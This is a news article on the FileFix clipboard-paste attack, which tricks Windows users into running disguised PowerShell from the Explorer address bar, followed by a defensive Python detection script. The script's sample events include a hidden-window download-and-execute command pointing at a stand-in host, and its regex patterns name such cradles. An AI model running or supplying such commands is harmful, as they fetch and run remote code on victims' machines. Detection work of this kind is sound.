Cybercriminals are now experimenting with a stealthy new attack method dubbed FileFix, capable of slipping past standard security systems with ease. According to cybersecurity experts at Check Point, attackers have already begun deploying the method in real-world scenarios — and though current payloads remain non-malicious, they warn that true malware deployment may be just around the corner.
The FileFix technique builds on ClickFix, a social engineering trick designed to lure users into running malicious commands via the Windows Run dialog. But FileFix requires even less user interaction. It opens a File Explorer window from a web page and quietly copies a disguised PowerShell command to the user’s clipboard. When unsuspecting victims paste it into the address bar, the command executes — without raising any security alarms.
“This isn’t about exploiting vulnerabilities — it’s about exploiting user behavior and trust,” Check Point researchers stated.
Security teams are particularly concerned about how quickly this method has gained traction. Just days after FileFix was publicly disclosed, Check Point noticed known threat actors already testing it in live environments.
“The rise of ClickFix in 2025 proves that social engineering remains one of the most cost-effective ways to bypass security,” they added. “FileFix is the next evolution — and it’s moving fast.”
Dray Agha, Senior Manager of Security Operations at Huntress, echoed those concerns, noting that the FileFix method has already been seen in widespread use. “It’s effective because it abuses core Windows functions and avoids traditional red flags. Users think they’re just pasting a file path — but they’re actually running malicious code.”
Agha confirmed Huntress has observed “aggressive deployment” of FileFix in the wild, tricking users at a scale that’s “deeply concerning.”
How to Stay Protected from FileFix
Check Point has issued specific recommendations for cybersecurity teams:
- Closely monitor phishing pages, especially those mimicking trusted services or using deceptive templates like those resembling Cloudflare verification screens.
- Adjust security rules to detect suspicious clipboard activity or unexpected PowerShell commands initiated by user actions.
- Keep user training and incident response protocols updated to reflect new social engineering trends.
They also encourage cultivating a “culture of verification”, urging employees to double-check unusual requests with IT or security teams before acting.
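One way to act on the second recommendation above, as an added example that is not from Check Point, Huntress or the article: a Python detection that scores process-creation records for PowerShell launched directly by File Explorer, the parent/child pair the address-bar trick produces. The records are constructed, and the field names follow the Sysmon Event ID 1 convention (an assumption about the telemetry source).

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names); not real telemetry.
# Record 0 mimics a FileFix-style paste, record 3 is a user who simply typed "powershell" in Explorer.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://example.invalid/x | iex" # C:\Users\Public\report.pdf'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"ParentImage": r"C:\Program Files\VSCode\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
# Flags that hide the window, bypass execution policy, or pass an encoded command.
SUSPICIOUS_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|e(p|xecutionpolicy)\s+bypass|e(nc|ncodedcommand)?\s+\S+)", re.I)
# Download-and-execute cradles commonly seen in ClickFix/FileFix-style payloads.
DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|curl|iex|invoke-expression|downloadstring)\b", re.I)
# Disguise trait: a Windows path trailing a PowerShell comment marker so the user "sees a file path".
PATH_AFTER_COMMENT = re.compile(r"#\s*[A-Za-z]:\\\S+")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons); 0 means the record is not FileFix-like at all."""
    if basename(ev["Image"]) not in SHELLS or basename(ev["ParentImage"]) != "explorer.exe":
        return 0, []
    reasons = ["PowerShell spawned directly by explorer.exe (address-bar execution)"]
    cmd = ev["CommandLine"]
    if SUSPICIOUS_FLAGS.search(cmd):
        reasons.append("hidden-window / bypass / encoded-command flags")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-and-execute cradle")
    if PATH_AFTER_COMMENT.search(cmd):
        reasons.append("file path after comment marker (disguise)")
    return len(reasons), reasons


def detect_filefix(events: list[dict], min_score: int = 2) -> list[tuple[str, list[str]]]:
    """Keep only records whose score reaches min_score; a bare explorer->powershell launch alone does not alert."""
    return [(ev["CommandLine"], r) for ev in events for s, r in [score_event(ev)] if s >= min_score]
```

The explorer.exe parent alone is kept as a low-score signal rather than an alert, since users do legitimately launch PowerShell from the address bar; the command-line indicators are what push a record over the threshold.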
Users should treat any web page or email prompting them to copy and paste information with caution. Legitimate platforms rarely ask users to manually execute commands to resolve issues, and such requests should always raise red flags.
News Source: ITPro.com